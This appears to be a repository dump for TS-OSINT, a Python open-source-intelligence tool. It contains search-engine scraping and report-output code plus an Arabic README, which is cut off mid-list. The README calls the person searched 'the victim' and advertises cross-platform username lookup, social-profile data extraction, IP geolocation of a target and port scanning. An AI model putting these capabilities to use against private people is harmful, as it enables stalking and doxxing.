import config as cfg 5 | 6 | 7 | class MultipleSearchEngines(object): 8 | '''Uses multiple search engines.''' 9 | def __init__(self, engines, proxy=cfg.PROXY, timeout=cfg.TIMEOUT): 10 | self._engines = [ 11 | se(proxy, timeout) 12 | for se in search_engines_dict.values() 13 | if se.__name__.lower() in engines 14 | ] 15 | self._filter = None 16 | 17 | self.ignore_duplicate_urls = False 18 | self.ignore_duplicate_domains = False 19 | self.results = SearchResults() 20 | self.banned_engines = [] 21 | 22 | def set_search_operator(self, operator): 23 | '''Filters search results based on the operator.''' 24 | self._filter = operator 25 | 26 | def search(self, query, pages=cfg.SEARCH_ENGINE_RESULTS_PAGES): 27 | '''Searches multiples engines and collects the results.''' 28 | self.results = SearchResults() 29 | for engine in self._engines: 30 | engine.ignore_duplicate_urls = self.ignore_duplicate_urls 31 | engine.ignore_duplicate_domains = self.ignore_duplicate_domains 32 | if self._filter: 33 | engine.set_search_operator(self._filter) 34 | 35 | engine_results = engine.search(query, pages) 36 | if engine.ignore_duplicate_urls: 37 | engine_results._results = [ 38 | item for item in engine_results._results 39 | if item['link'] not in self.results.links() 40 | ] 41 | if self.ignore_duplicate_domains: 42 | engine_results._results = [ 43 | item for item in engine_results._results 44 | if item['host'] not in self.results.hosts() 45 | ] 46 | self.results._results += engine_results._results 47 | 48 | if engine.is_banned: 49 | self.banned_engines.append(engine.__class__.__name__) 50 | return self.results 51 | 52 | def output(self, output=out.PRINT, path=None): 53 | '''Prints search results and/or creates report files.''' 54 | output = (output or '').lower() 55 | query = self._engines[0]._query if self._engines else u'' 56 | if not path: 57 | path = cfg.OUTPUT_DIR + u'_'.join(query.split()) 58 | out.console('') 59 | 60 | if out.PRINT in output: 61 | out.print_results(self._engines) 62 | if out.HTML in output: 63 | out.write_file(out.create_html_data(self._engines), path + u'.html') 64 | if out.CSV in output: 65 | out.write_file(out.create_csv_data(self._engines), path + u'.csv') 66 | if out.JSON in output: 67 | out.write_file(out.create_json_data(self._engines), path + u'.json') 68 | 69 | 70 | class AllSearchEngines(MultipleSearchEngines): 71 | '''Uses all search engines.''' 72 | def __init__(self, proxy=cfg.PROXY, timeout=cfg.TIMEOUT): 73 | super(AllSearchEngines, self).__init__( 74 | list(search_engines_dict), proxy, timeout 75 | ) 76 | 77 | -------------------------------------------------------------------------------- /search_engines/libs/get_terminal_size.py: -------------------------------------------------------------------------------- 1 | ## Code taken from https://github.com/chrippa/backports.shutil_get_terminal_size/blob/master/backports/shutil_get_terminal_size/get_terminal_size.py 2 | 3 | """This is a backport of shutil.get_terminal_size from Python 3.3. 4 | The original implementation is in C, but here we use the ctypes and 5 | fcntl modules to create a pure Python version of os.get_terminal_size. 
6 | """ 7 | 8 | import os 9 | import struct 10 | import sys 11 | 12 | from collections import namedtuple 13 | 14 | __all__ = ["get_terminal_size"] 15 | 16 | 17 | terminal_size = namedtuple("terminal_size", "columns lines") 18 | 19 | try: 20 | from ctypes import windll, create_string_buffer, WinError 21 | 22 | _handle_ids = { 23 | 0: -10, 24 | 1: -11, 25 | 2: -12, 26 | } 27 | 28 | def _get_terminal_size(fd): 29 | handle = windll.kernel32.GetStdHandle(_handle_ids[fd]) 30 | if handle == 0: 31 | raise OSError('handle cannot be retrieved') 32 | if handle == -1: 33 | raise WinError() 34 | csbi = create_string_buffer(22) 35 | res = windll.kernel32.GetConsoleScreenBufferInfo(handle, csbi) 36 | if res: 37 | res = struct.unpack("hhhhHhhhhhh", csbi.raw) 38 | left, top, right, bottom = res[5:9] 39 | columns = right - left + 1 40 | lines = bottom - top + 1 41 | return terminal_size(columns, lines) 42 | else: 43 | raise WinError() 44 | 45 | except ImportError: 46 | import fcntl 47 | import termios 48 | 49 | def _get_terminal_size(fd): 50 | try: 51 | res = fcntl.ioctl(fd, termios.TIOCGWINSZ, b"\x00" * 4) 52 | except IOError as e: 53 | raise OSError(e) 54 | lines, columns = struct.unpack("hh", res) 55 | 56 | return terminal_size(columns, lines) 57 | 58 | 59 | def get_terminal_size(fallback=(80, 24)): 60 | """Get the size of the terminal window. 61 | For each of the two dimensions, the environment variable, COLUMNS 62 | and LINES respectively, is checked. If the variable is defined and 63 | the value is a positive integer, it is used. 64 | When COLUMNS or LINES is not defined, which is the common case, 65 | the terminal connected to sys.__stdout__ is queried 66 | by invoking os.get_terminal_size. 67 | If the terminal size cannot be successfully queried, either because 68 | the system doesn't support querying, or because we are not 69 | connected to a terminal, the value given in fallback parameter 70 | is used. Fallback defaults to (80, 24) which is the default 71 | size used by many terminal emulators. 72 | The value returned is a named tuple of type os.terminal_size. 
73 | """ 74 | # Try the environment first 75 | try: 76 | columns = int(os.environ["COLUMNS"]) 77 | except (KeyError, ValueError): 78 | columns = 0 79 | 80 | try: 81 | lines = int(os.environ["LINES"]) 82 | except (KeyError, ValueError): 83 | lines = 0 84 | 85 | # Only query if necessary 86 | if columns <= 0 or lines <= 0: 87 | try: 88 | size = _get_terminal_size(sys.__stdout__.fileno()) 89 | except (NameError, OSError): 90 | size = terminal_size(*fallback) 91 | 92 | if columns <= 0: 93 | columns = size.columns 94 | if lines <= 0: 95 | lines = size.lines 96 | 97 | return terminal_size(columns, lines) 98 | 99 | -------------------------------------------------------------------------------- /search_engines/output.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | 3 | import csv 4 | import json 5 | import io 6 | import re 7 | from collections import namedtuple 8 | 9 | try: 10 | from shutil import get_terminal_size 11 | except ImportError: 12 | from .libs.get_terminal_size import get_terminal_size 13 | 14 | from .utils import encode_str, decode_bytes 15 | from .libs import windows_cmd_encoding 16 | from .config import PYTHON_VERSION 17 | 18 | 19 | def print_results(search_engines): 20 | '''Prints the search results.''' 21 | for engine in search_engines: 22 | console(engine.__class__.__name__ + u' results') 23 | 24 | for i, v in enumerate(engine.results, 1): 25 | console(u'{:<4}{}'.format(i, v['link'])) 26 | console(u'') 27 | 28 | def create_csv_data(search_engines): 29 | '''CSV formats the search results.''' 30 | encoder = decode_bytes if PYTHON_VERSION == 3 else encode_str 31 | data = [['query', 'engine', 'domain', 'URL', 'title', 'text']] 32 | 33 | for engine in search_engines: 34 | for i in engine.results: 35 | row = [ 36 | engine._query, engine.__class__.__name__, 37 | i['host'], i['link'], i['title'], i['text'] 38 | ] 39 | row = [encoder(i) for i in row] 40 | data.append(row) 41 | return data 42 | 43 | def create_json_data(search_engines): 44 | '''JSON formats the search results.''' 45 | jobj = { 46 | u'query': search_engines[0]._query, 47 | u'results': { 48 | se.__class__.__name__: [i for i in se.results] 49 | for se in search_engines 50 | } 51 | } 52 | return json.dumps(jobj) 53 | 54 | def create_html_data(search_engines): 55 | '''HTML formats the search results.''' 56 | query = decode_bytes(search_engines[0]._query) if search_engines else u'' 57 | tables = u'' 58 | 59 | for engine in search_engines: 60 | rows = u'' 61 | for i, v in enumerate(engine.results, 1): 62 | data = u'' 63 | if u'title' in engine._filters: 64 | data += HtmlTemplate.data.format(_replace_with_bold(query, v['title'])) 65 | if u'text' in engine._filters: 66 | data += HtmlTemplate.data.format(_replace_with_bold(query, v['text'])) 67 | link = _replace_with_bold(query, v['link']) if u'url' in engine._filters else v['link'] 68 | rows += HtmlTemplate.row.format(number=i, href=v['link'], link=link, data=data) 69 | 70 | engine_name = engine.__class__.__name__ 71 | tables += HtmlTemplate.table.format(engine=engine_name, rows=rows) 72 | return HtmlTemplate.html.format(query=query, table=tables) 73 | 74 | def _replace_with_bold(query, data): 75 | '''Places the query in tags.''' 76 | for match in re.findall(query, data, re.I): 77 | data = data.replace(match, u'{}'.format(match)) 78 | return data 79 | 80 | 81 | def write_file(data, path, encoding='utf-8'): 82 | '''Writes search results data to file.''' 83 | try: 84 | if PYTHON_VERSION == 2 and 
type(data) in (list, str): 85 | f = io.open(path, 'wb') 86 | else: 87 | f = io.open(path, 'w', encoding=encoding, newline='') 88 | 89 | if type(data) is list: 90 | writer = csv.writer(f) 91 | writer.writerows(data) 92 | else: 93 | f.write(data) 94 | f.close() 95 | console(u'Output file: ' + path) 96 | except IOError as e: 97 | console(e, level=Level.error) 98 | 99 | 100 | def console(msg, end='\n', level=None): 101 | '''Prints data on the console.''' 102 | console_len = get_terminal_size().columns 103 | clear_line = u'\r{}\r'.format(u' ' * (console_len - 1)) 104 | msg = clear_line + (level or u'') + msg 105 | print(msg, end=end) 106 | 107 | Level = namedtuple('Level', ['info', 'warning', 'error'])( 108 | info = u'INFO ', 109 | warning = u'WARNING ', 110 | error = u'ERROR ' 111 | ) 112 | 113 | PRINT = 'print' 114 | HTML = 'html' 115 | JSON = 'json' 116 | CSV = 'csv' 117 | 118 | 119 | class HtmlTemplate: 120 | '''HTML template.''' 121 | html = u''' 122 | 123 | 124 | Search Results 125 | 132 | 133 | 134 | 135 | 136 | 137 |
Query: '{query}'
138 | {table} 139 | 140 | 141 | ''' 142 | table = u''' 143 | 144 |
{engine} search results
145 | 146 | {rows} 147 |
148 |
149 | ''' 150 | row = u''' 151 | {number}) 152 | {link} 153 | {data} 154 | 155 | ''' 156 | data = u'''{}''' 157 | 158 | -------------------------------------------------------------------------------- /search_engines/engine.py: -------------------------------------------------------------------------------- 1 | from bs4 import BeautifulSoup 2 | from time import sleep 3 | from random import uniform as random_uniform 4 | 5 | from .results import SearchResults 6 | from .http_client import HttpClient 7 | from . import utils 8 | from . import output as out 9 | from . import config as cfg 10 | 11 | 12 | class SearchEngine(object): 13 | '''The base class for all Search Engines.''' 14 | def __init__(self, proxy=cfg.PROXY, timeout=cfg.TIMEOUT): 15 | ''' 16 | :param str proxy: optional, a proxy server 17 | :param int timeout: optional, the HTTP timeout 18 | ''' 19 | self._http_client = HttpClient(timeout, proxy) 20 | self._delay = (1, 4) 21 | self._query = '' 22 | self._filters = [] 23 | 24 | self.results = SearchResults() 25 | '''The search results.''' 26 | self.ignore_duplicate_urls = False 27 | '''Collects only unique URLs.''' 28 | self.ignore_duplicate_domains = False 29 | '''Collects only unique domains.''' 30 | self.is_banned = False 31 | '''Indicates if a ban occured''' 32 | 33 | def _selectors(self, element): 34 | '''Returns the appropriate CSS selector.''' 35 | raise NotImplementedError() 36 | 37 | def _first_page(self): 38 | '''Returns the initial page URL.''' 39 | raise NotImplementedError() 40 | 41 | def _next_page(self, tags): 42 | '''Returns the next page URL and post data.''' 43 | raise NotImplementedError() 44 | 45 | def _get_url(self, tag, item='href'): 46 | '''Returns the URL of search results items.''' 47 | selector = self._selectors('url') 48 | url = self._get_tag_item(tag.select_one(selector), item) 49 | return utils.unquote_url(url) 50 | 51 | def _get_title(self, tag, item='text'): 52 | '''Returns the title of search results items.''' 53 | selector = self._selectors('title') 54 | return self._get_tag_item(tag.select_one(selector), item) 55 | 56 | def _get_text(self, tag, item='text'): 57 | '''Returns the text of search results items.''' 58 | selector = self._selectors('text') 59 | return self._get_tag_item(tag.select_one(selector), item) 60 | 61 | def _get_page(self, page, data=None): 62 | '''Gets pagination links.''' 63 | if data: 64 | return self._http_client.post(page, data) 65 | return self._http_client.get(page) 66 | 67 | def _get_tag_item(self, tag, item): 68 | '''Returns Tag attributes.''' 69 | if not tag: 70 | return u'' 71 | return tag.text if item == 'text' else tag.get(item, u'') 72 | 73 | def _item(self, link): 74 | '''Returns a dictionary of the link data.''' 75 | return { 76 | 'host': utils.domain(self._get_url(link)), 77 | 'link': self._get_url(link), 78 | 'title': self._get_title(link).strip(), 79 | 'text': self._get_text(link).strip() 80 | } 81 | 82 | def _query_in(self, item): 83 | '''Checks if query is contained in the item.''' 84 | return self._query.lower() in item.lower() 85 | 86 | def _filter_results(self, soup): 87 | '''Processes and filters the search results.''' 88 | tags = soup.select(self._selectors('links')) 89 | results = [self._item(l) for l in tags] 90 | 91 | if u'url' in self._filters: 92 | results = [l for l in results if self._query_in(l['link'])] 93 | if u'title' in self._filters: 94 | results = [l for l in results if self._query_in(l['title'])] 95 | if u'text' in self._filters: 96 | results = [l for l in results if self._query_in(l['text'])] 
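# Each operator enabled via set_search_operator() narrows the results to items
# whose corresponding field contains the query string; the 'host' filter below
# matches the query against the result's domain rather than the full URL.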
97 | if u'host' in self._filters: 98 | results = [l for l in results if self._query_in(utils.domain(l['link']))] 99 | return results 100 | 101 | def _collect_results(self, items): 102 | '''Colects the search results items.''' 103 | for item in items: 104 | if not utils.is_url(item['link']): 105 | continue 106 | if item in self.results: 107 | continue 108 | if self.ignore_duplicate_urls and item['link'] in self.results.links(): 109 | continue 110 | if self.ignore_duplicate_domains and item['host'] in self.results.hosts(): 111 | continue 112 | self.results.append(item) 113 | 114 | def _is_ok(self, response): 115 | '''Checks if the HTTP response is 200 OK.''' 116 | self.is_banned = response.http in [403, 429, 503] 117 | 118 | if response.http == 200: 119 | return True 120 | msg = ('HTTP ' + str(response.http)) if response.http else response.html 121 | out.console(msg, level=out.Level.error) 122 | return False 123 | 124 | def set_headers(self, headers): 125 | '''Sets HTTP headers. 126 | 127 | :param headers: dict The headers 128 | ''' 129 | self._http_client.session.headers.update(headers) 130 | 131 | def set_search_operator(self, operator): 132 | '''Filters search results based on the operator. 133 | Supported operators: 'url', 'title', 'text', 'host' 134 | 135 | :param operator: str The search operator(s) 136 | ''' 137 | operators = utils.decode_bytes(operator or u'').lower().split(u',') 138 | supported_operators = [u'url', u'title', u'text', u'host'] 139 | 140 | for operator in operators: 141 | if operator not in supported_operators: 142 | msg = u'Ignoring unsupported operator "{}"'.format(operator) 143 | out.console(msg, level=out.Level.warning) 144 | else: 145 | self._filters += [operator] 146 | 147 | def search(self, query, pages=cfg.SEARCH_ENGINE_RESULTS_PAGES): 148 | '''Queries the search engine, goes through the pages and collects the results. 149 | 150 | :param query: str The search query 151 | :param pages: int Optional, the maximum number of results pages to search 152 | :returns SearchResults object 153 | ''' 154 | # out.console('Searching {}'.format(self.__class__.__name__)) 155 | self._query = utils.decode_bytes(query) 156 | self.results = SearchResults() 157 | request = self._first_page() 158 | 159 | for page in range(1, pages + 1): 160 | try: 161 | response = self._get_page(request['url'], request['data']) 162 | if not self._is_ok(response): 163 | break 164 | tags = BeautifulSoup(response.html, "html.parser") 165 | items = self._filter_results(tags) 166 | self._collect_results(items) 167 | 168 | msg = 'page: {:<8} links: {}'.format(page, len(self.results)) 169 | out.console(msg, end='') 170 | request = self._next_page(tags) 171 | 172 | if not request['url']: 173 | break 174 | if page < pages: 175 | sleep(random_uniform(*self._delay)) 176 | except KeyboardInterrupt: 177 | break 178 | out.console('', end='') 179 | return self.results 180 | 181 | def output(self, output=out.PRINT, path=None): 182 | '''Prints search results and/or creates report files. 183 | Supported output format: html, csv, json. 
184 | 185 | :param output: str Optional, the output format 186 | :param path: str Optional, the file to save the report 187 | ''' 188 | output = (output or '').lower() 189 | if not path: 190 | path = cfg.os_path.join(cfg.OUTPUT_DIR, u'_'.join(self._query.split())) 191 | out.console('') 192 | 193 | if out.PRINT in output: 194 | out.print_results([self]) 195 | if out.HTML in output: 196 | out.write_file(out.create_html_data([self]), path + u'.html') 197 | if out.CSV in output: 198 | out.write_file(out.create_csv_data([self]), path + u'.csv') 199 | if out.JSON in output: 200 | out.write_file(out.create_json_data([self]), path + u'.json') 201 | -------------------------------------------------------------------------------- /search_engines/libs/windows_cmd_encoding.py: -------------------------------------------------------------------------------- 1 | # Code taken from this great answer on stackoverflow.com: 2 | # https://stackoverflow.com/questions/878972/windows-cmd-encoding-change-causes-python-crash/3259271#3259271 3 | # Many thanks to the author, Daira Hopwood https://stackoverflow.com/users/393146/daira-hopwood 4 | 5 | 6 | import sys 7 | 8 | if sys.platform == "win32" and sys.version_info.major == 2: 9 | import codecs 10 | from ctypes import WINFUNCTYPE, windll, POINTER, byref, c_int 11 | from ctypes.wintypes import BOOL, HANDLE, DWORD, LPWSTR, LPCWSTR, LPVOID 12 | 13 | original_stderr = sys.stderr 14 | 15 | # If any exception occurs in this code, we'll probably try to print it on stderr, 16 | # which makes for frustrating debugging if stderr is directed to our wrapper. 17 | # So be paranoid about catching errors and reporting them to original_stderr, 18 | # so that we can at least see them. 19 | def _complain(message): 20 | print >>original_stderr, message if isinstance(message, str) else repr(message) 21 | 22 | # Work around . 23 | codecs.register(lambda name: codecs.lookup('utf-8') if name == 'cp65001' else None) 24 | 25 | # Make Unicode console output work independently of the current code page. 26 | # This also fixes . 27 | # Credit to Michael Kaplan 28 | # and TZOmegaTZIOY 29 | # . 
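# In short: the block below checks whether stdout/stderr are attached to a real
# Windows console (GetStdHandle + GetFileType + GetConsoleMode). If they are, the
# streams are replaced with a UnicodeOutput wrapper that writes through
# WriteConsoleW, so Unicode output survives regardless of the console code page;
# otherwise the original (possibly redirected) streams are wrapped and written
# as UTF-8 bytes.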
30 | try: 31 | # 32 | # HANDLE WINAPI GetStdHandle(DWORD nStdHandle); 33 | # returns INVALID_HANDLE_VALUE, NULL, or a valid handle 34 | # 35 | # 36 | # DWORD WINAPI GetFileType(DWORD hFile); 37 | # 38 | # 39 | # BOOL WINAPI GetConsoleMode(HANDLE hConsole, LPDWORD lpMode); 40 | 41 | GetStdHandle = WINFUNCTYPE(HANDLE, DWORD)(("GetStdHandle", windll.kernel32)) 42 | STD_OUTPUT_HANDLE = DWORD(-11) 43 | STD_ERROR_HANDLE = DWORD(-12) 44 | GetFileType = WINFUNCTYPE(DWORD, DWORD)(("GetFileType", windll.kernel32)) 45 | FILE_TYPE_CHAR = 0x0002 46 | FILE_TYPE_REMOTE = 0x8000 47 | GetConsoleMode = WINFUNCTYPE(BOOL, HANDLE, POINTER(DWORD))(("GetConsoleMode", windll.kernel32)) 48 | INVALID_HANDLE_VALUE = DWORD(-1).value 49 | 50 | def not_a_console(handle): 51 | if handle == INVALID_HANDLE_VALUE or handle is None: 52 | return True 53 | return ((GetFileType(handle) & ~FILE_TYPE_REMOTE) != FILE_TYPE_CHAR 54 | or GetConsoleMode(handle, byref(DWORD())) == 0) 55 | 56 | old_stdout_fileno = None 57 | old_stderr_fileno = None 58 | if hasattr(sys.stdout, 'fileno'): 59 | old_stdout_fileno = sys.stdout.fileno() 60 | if hasattr(sys.stderr, 'fileno'): 61 | old_stderr_fileno = sys.stderr.fileno() 62 | 63 | STDOUT_FILENO = 1 64 | STDERR_FILENO = 2 65 | real_stdout = (old_stdout_fileno == STDOUT_FILENO) 66 | real_stderr = (old_stderr_fileno == STDERR_FILENO) 67 | 68 | if real_stdout: 69 | hStdout = GetStdHandle(STD_OUTPUT_HANDLE) 70 | if not_a_console(hStdout): 71 | real_stdout = False 72 | 73 | if real_stderr: 74 | hStderr = GetStdHandle(STD_ERROR_HANDLE) 75 | if not_a_console(hStderr): 76 | real_stderr = False 77 | 78 | if real_stdout or real_stderr: 79 | # BOOL WINAPI WriteConsoleW(HANDLE hOutput, LPWSTR lpBuffer, DWORD nChars, 80 | # LPDWORD lpCharsWritten, LPVOID lpReserved); 81 | 82 | WriteConsoleW = WINFUNCTYPE(BOOL, HANDLE, LPWSTR, DWORD, POINTER(DWORD), LPVOID)(("WriteConsoleW", windll.kernel32)) 83 | 84 | class UnicodeOutput: 85 | def __init__(self, hConsole, stream, fileno, name): 86 | self._hConsole = hConsole 87 | self._stream = stream 88 | self._fileno = fileno 89 | self.closed = False 90 | self.softspace = False 91 | self.mode = 'w' 92 | self.encoding = 'utf-8' 93 | self.name = name 94 | self.flush() 95 | 96 | def isatty(self): 97 | return False 98 | 99 | def close(self): 100 | # don't really close the handle, that would only cause problems 101 | self.closed = True 102 | 103 | def fileno(self): 104 | return self._fileno 105 | 106 | def flush(self): 107 | if self._hConsole is None: 108 | try: 109 | self._stream.flush() 110 | except Exception as e: 111 | _complain("%s.flush: %r from %r" % (self.name, e, self._stream)) 112 | raise 113 | 114 | def write(self, text): 115 | try: 116 | if self._hConsole is None: 117 | if isinstance(text, unicode): 118 | text = text.encode('utf-8') 119 | self._stream.write(text) 120 | else: 121 | if not isinstance(text, unicode): 122 | text = str(text).decode('utf-8') 123 | remaining = len(text) 124 | while remaining: 125 | n = DWORD(0) 126 | # There is a shorter-than-documented limitation on the 127 | # length of the string passed to WriteConsoleW (see 128 | # . 
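# The loop therefore writes at most 10000 characters per call and advances by
# however many characters WriteConsoleW reports as actually written (n.value).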
129 | retval = WriteConsoleW(self._hConsole, text, min(remaining, 10000), byref(n), None) 130 | if retval == 0 or n.value == 0: 131 | raise IOError("WriteConsoleW returned %r, n.value = %r" % (retval, n.value)) 132 | remaining -= n.value 133 | if not remaining: 134 | break 135 | text = text[n.value:] 136 | except Exception as e: 137 | _complain("%s.write: %r" % (self.name, e)) 138 | raise 139 | 140 | def writelines(self, lines): 141 | try: 142 | for line in lines: 143 | self.write(line) 144 | except Exception as e: 145 | _complain("%s.writelines: %r" % (self.name, e)) 146 | raise 147 | 148 | if real_stdout: 149 | sys.stdout = UnicodeOutput(hStdout, None, STDOUT_FILENO, '') 150 | else: 151 | sys.stdout = UnicodeOutput(None, sys.stdout, old_stdout_fileno, '') 152 | 153 | if real_stderr: 154 | sys.stderr = UnicodeOutput(hStderr, None, STDERR_FILENO, '') 155 | else: 156 | sys.stderr = UnicodeOutput(None, sys.stderr, old_stderr_fileno, '') 157 | except Exception as e: 158 | _complain("exception %r while fixing up sys.stdout and sys.stderr" % (e,)) 159 | 160 | 161 | # While we're at it, let's unmangle the command-line arguments: 162 | 163 | # This works around . 164 | GetCommandLineW = WINFUNCTYPE(LPWSTR)(("GetCommandLineW", windll.kernel32)) 165 | CommandLineToArgvW = WINFUNCTYPE(POINTER(LPWSTR), LPCWSTR, POINTER(c_int))(("CommandLineToArgvW", windll.shell32)) 166 | 167 | argc = c_int(0) 168 | argv_unicode = CommandLineToArgvW(GetCommandLineW(), byref(argc)) 169 | 170 | argv = [argv_unicode[i].encode('utf-8') for i in xrange(0, argc.value)] 171 | 172 | if not hasattr(sys, 'frozen'): 173 | # If this is an executable produced by py2exe or bbfreeze, then it will 174 | # have been invoked directly. Otherwise, unicode_argv[0] is the Python 175 | # interpreter, so skip that. 176 | argv = argv[1:] 177 | 178 | # Also skip option arguments to the Python interpreter. 
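# Illustrative example: for an invocation like "python -O script.py foo", the loop
# below drops the interpreter's "-O" flag so argv starts at the script's own
# arguments; "-m" and "-c" are handled as special cases.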
179 | while len(argv) > 0: 180 | arg = argv[0] 181 | if not arg.startswith(u"-") or arg == u"-": 182 | break 183 | argv = argv[1:] 184 | if arg == u'-m': 185 | # sys.argv[0] should really be the absolute path of the module source, 186 | # but never mind 187 | break 188 | if arg == u'-c': 189 | argv[0] = u'-c' 190 | break 191 | 192 | # if you like: 193 | sys.argv = argv 194 | 195 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # TS-OSINT (TLER AL-SHAHRANI-OSINT) 2 | ## أداة تطبيق مفهوم الـOSINT 3 | ###### OSINT = Open-Source Intelligence | استخبارات مفتوحة المصدر 4 | 5 | 6 | 7 | ### تثبيت المكاتب 8 | ``` 9 | pip install requests praw ipaddress psutil pillow opencv-python selenium rich phonenumbers bs4 telethon googlesearch-python tabulate 10 | ``` 11 | 12 | ### أوامر التثبيت (Linux, Termux, iSH)، بالنسبة للـWindows توجد نسخة .exe 13 | ``` 14 | sudo git clone https://github.com/tlersa/TS-OSINT.git 15 | cd TS-OSINT/ 16 | sudo python3 TS-OSINT.py 17 | ``` 18 | 19 | ### [نسخة .exe للـWindows](https://t.me/tler_sa/167) 20 | 21 | ### المميزات 22 | - مجانية ومفتوحة المصدر ✔️ 23 | - سهولة الاستخدام وتعدد الخيارات لراحة المستخدم ✔️ 24 | - إذا لم تكن مثبت المكاتب المطلوبة سيتم تثبيتها تلقائيا ✔️ 25 | - المصداقية والدقة بالمعلومات المستخرجة بنسبة 💯✔️ 26 | - تعمل على كل الأنظمة ✔️ 27 | - بالخيار 1 يتم البحث عن الضحية في Google, Bing, Brave ✔️ 28 | - بالخيار 1 يمكنك تحديد عدد الصفحات المراد البحث فيها ✔️ 29 | - بالخيار 1 و10 و14 يتم حفظ نتائج البحث في ملف نصي وذلك لتحليل النتائج، وأيضا الثاني ولكن اختياري ✔️ 30 | - بالخيار 2 يتم البحث عن اسم المستخدم لحسابات الضحية في 62 منصة تواصل اجتماعي محلية وعالمية ✔️ 31 | - بالخيار 2 سرعة البحث عن اسم المستخدم لحسابات الضحية هو 0.5ث لكل منصة ✔️ 32 | - بالخيار 11 يمكنك تحديد عدد المنافذ المراد فحصها ✔️ 33 | - بالخيار 11 سرعة فحص المنافذ فحص 100 منفذ بنفس الوقت ✔️ 34 | - إمكانية تحديث الأداة بسهولة ✔️ 35 | ### الخيارات 36 | - الخيار 1 : مفهوم Google Dorks 37 | - الخيار 2 : يبحث عن اسم المستخدم المراد البحث عنه في 61 منصة تواصل اجتماعي محلية وعالمية 38 | - الخيار 3 : يستخرج معلومات المستخدمين الآتية لمنصات التواصل الآتية 39 | - منصة Instagram 40 | - معرّف المستخدم 41 | - هل هو حساب أعمال؟ 42 | - هل الحساب موثق بالعلامة الزرقاء؟ 43 | - هل الحساب خاص؟ 44 | - اسم المستخدم 45 | - كنية المستخدم 46 | - صورة الحساب 47 | - عدد المتابعين 48 | - عدد الذين يتابعهم 49 | - عدد المشاهدين الذين يتابعهم 50 | - عدد المشاهدين 51 | - عدد المنشورات 52 | - هل هو ناشر قصص عامة؟ 53 | - هل لديه قصص حاليا؟ 54 | - هل لديه قصص مثبتة؟ 55 | - عدد فيديوهات الـIGTV 56 | - وصف الحساب 57 | - روابط الوصف 58 | - هل لديه طلبات للمشاهدين؟ 59 | - هل لديه طلبات من المشاهدين؟ 60 | - منصة Telegram 61 | - اسم المستخدم 62 | - معرف المستخدم 63 | - الاسم الأول 64 | - الاسم الأخير 65 | - الرقم 66 | - منصة TikTok 67 | - اسم المستخدم 68 | - كنية المستخدم 69 | - معرّف المستخدم 70 | - معرّف المستخدم الثاني 71 | - هل الحساب موثق بالعلامة الزرقاء؟ 72 | - هل الحساب خاص؟ 73 | - موقع الحساب 74 | - عدد المتابعين 75 | - عدد الذين يتابعهم 76 | - هل المستخدم يسمح برؤية الآخرين للذين يتابعهم؟ 77 | - عدد المنشورات 78 | - عدد الإعجابات الإجمالي 79 | - هل الحساب يسمح برؤية الآخرين للمنشورات المحفوظة؟ 80 | - لغة الحساب 81 | - تاريخ إنشاء الحساب بالسنة والشهر 82 | - تاريخ آخر تغيير للكنية 83 | - منصة Github 84 | - اسم المستخدم 85 | - كنية المستخدم 86 | - نوع الحساب 87 | - رابط الحساب 88 | - معرّف الحساب 89 | - الشركة 90 | - الوصف 91 | - البريد الإلكرتوني العام 92 | - روابط الوصف 93 | - رابط حساب X 
المرتبط 94 | - صورة الحساب 95 | - موقع الحساب 96 | - عدد المتابعين 97 | - عدد الذين يتابعهم 98 | - المستودعات العامة 99 | - الـgits العامة 100 | - تاريخ إنشاء الحساب 101 | - الـHireable 102 | - آخر تحديث للحساب 103 | - منصة Reddit 104 | - اسم المستخدم 105 | - كنية المستخدم 106 | - معرّف المستخدم 107 | - صورة الحساب 108 | - الوصف 109 | - روابط الوصف 110 | - البريد الإلكتروني العام 111 | - الرقم العام 112 | - تاريخ إنشاء الحساب 113 | - منصة Tellonym 114 | - اسم المستخدم 115 | - كنية المستخدم 116 | - معرّف المستخدم 117 | - الوصف 118 | - صورة الحساب 119 | - موقع الحساب 120 | - عدد المتابعين 121 | - عدد المتابعين الحقيقين 122 | - عدد المتابعين الغير معروفين 123 | - عدد الذين يتابعهم 124 | - عدد التيل 125 | - عدد الأسئلة 126 | - عدد الإعجابات الإجمالية 127 | - هل الحساب موثق؟ 128 | - هل الحساب يستطيع التعليق؟ 129 | - هل الحساب متصل الآن؟ 130 | - منصة Sony 131 | - الخيار 1 و2 و3 : جلب معلومات الآتية لحسابك ماعدا من الجوائز إلى المحظورين بالخيار 2 و3 132 | - المعرّف 133 | - اسم المستخدم 134 | - كنية المستخدم 135 | - جهاز PlayStation 136 | - معرّف الجهاز 137 | - نوع الجهاز 138 | - تاريخ أول اتصال بالجهاز 139 | - صورة الحساب 140 | - هل يملك اشتراك بلس؟ 141 | - الجوائز 142 | - قائمة الأصدقاء 143 | - قائمة المحظورين 144 | - الخيار 4 : استخراج المعلومات الآتية لأي موقع بواسطة الـIP او الـDomain الخاص به 145 | - الـURL 146 | - الـIP 147 | - الـIP بصيغة Binary 148 | - الـIP بصيغة Hex 149 | - إصدار الـIP 150 | - مزود حدمة الإنرنت 151 | - الـFQDN 152 | - الـAsn 153 | - حالة الموقع 154 | - القارة 155 | - رمز القارة 156 | - الدولة 157 | - رمز الدولة 158 | - موقع الموقع 159 | - اسم منطقة الموقع 160 | - المدينة 161 | - المنطقة/المقاطعة/الحي/الدائرة/المحافظة/القضاء/الجزئية/الإقليم/المديرية/القسم 162 | - الرمز البريدي 163 | - العملة 164 | - خطوط الطول 165 | - خطوط العرض 166 | - الـOffset 167 | - الهاتف 168 | - الـProxy 169 | - مكان الاستضافة 170 | - الخيار 5 : ينقسم لقسمين : 171 | - القسم الأول : استخراج معلومات الـIP الآتية للضحية بواسطة الـIP الخاص به 172 | - الـIP 173 | - إصدار الـIP 174 | - الـIP بصيغة Binary 175 | - الـIP بصيغة Hex 176 | - مزود خدمة الانرنت 177 | - الدولة 178 | - المنطقة 179 | - المدينة 180 | - الرمز البريدي 181 | - خطوط الطول 182 | - خطوط العرض 183 | - القسم الثاني : استخراج المعلومات الآتية لجهاز مستخدم الأداة 184 | - نظام التشغيل 185 | - نسخة نظام التشغيل 186 | - البت وبيئة التثبيت 187 | - عدد النواة الإجمالي والمادي 188 | - الحد الأقصى والأدنى والتردد الحالي 189 | - نموذج عن استخدام المعالج 190 | - مساحة التخزين الإجمالية والمستخدمة والفارغة 191 | - اسم استضافة الجهاز بالشبكة 192 | - الـIP 193 | - إصدار الـIP 194 | - الـIP بصيغة Binary 195 | - 